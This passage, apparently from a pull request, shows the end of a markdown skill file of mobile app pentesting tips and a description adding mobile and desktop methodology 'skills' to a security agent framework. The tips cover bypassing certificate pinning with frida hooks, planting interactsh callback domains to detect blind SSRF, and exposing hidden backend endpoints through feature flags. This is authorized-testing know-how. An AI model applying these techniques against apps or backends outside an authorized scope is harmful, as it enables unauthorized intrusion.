+4. Two principals beat one: register/redeem with two TestFlight testers so you can diff API responses for IDOR/BFLA instead of guessing.
+5. If objection's pinning bypass fails, write a targeted frida hook on the specific `URLSession` delegate or `SecTrustEvaluateWithError` — generic scripts miss custom pinning.
+6. Embed an `interactsh-client` OAST domain in deep-link, webview, and API params to catch blind SSRF/callbacks server-side, and confirm the hit comes from the backend IP, not your device.
+7. Search `Assets.car` and bundled JSON for feature flags — toggling a hidden flag client-side often exposes unfinished, unauthenticated backend endpoints.
+8. The IPA is reconnaissance; the backend is the breach. Spend most of the time on the API surface the captured traffic reveals.


### PR DESCRIPTION
## What

Adds deep per-asset methodology **skills** for Mobile and desktop/compiled-software asset types.

Part of the asset-coverage effort (foundation in #533, which adds the asset taxonomy + detection + recommended-skill hooks). These files provide the deep methodology each asset type's recommendation points at.

## Skills added

- `strix/skills/mobile/android_play_store.md`
- `strix/skills/mobile/ios_app_store.md`
- `strix/skills/mobile/ios_testflight.md`
- `strix/skills/desktop/browser_extension.md`
- `strix/skills/desktop/electron_app.md`
- `strix/skills/desktop/linux_package.md`
- `strix/skills/desktop/macos_app.md`
- `strix/skills/desktop/windows_store_app.md`

## Notes

- Markdown only; no code changes. Auto-discovered by the skills loader (`get_available_skills` / `load_skills`), so they appear in `available_skills` and are loadable via `load_skill` or `create_agent(skills=[...])`.
- Each follows the house template/tone (cf. `vulnerabilities/ssrf.md`).
- No filename overlap with #532 (complementary asset coverage).
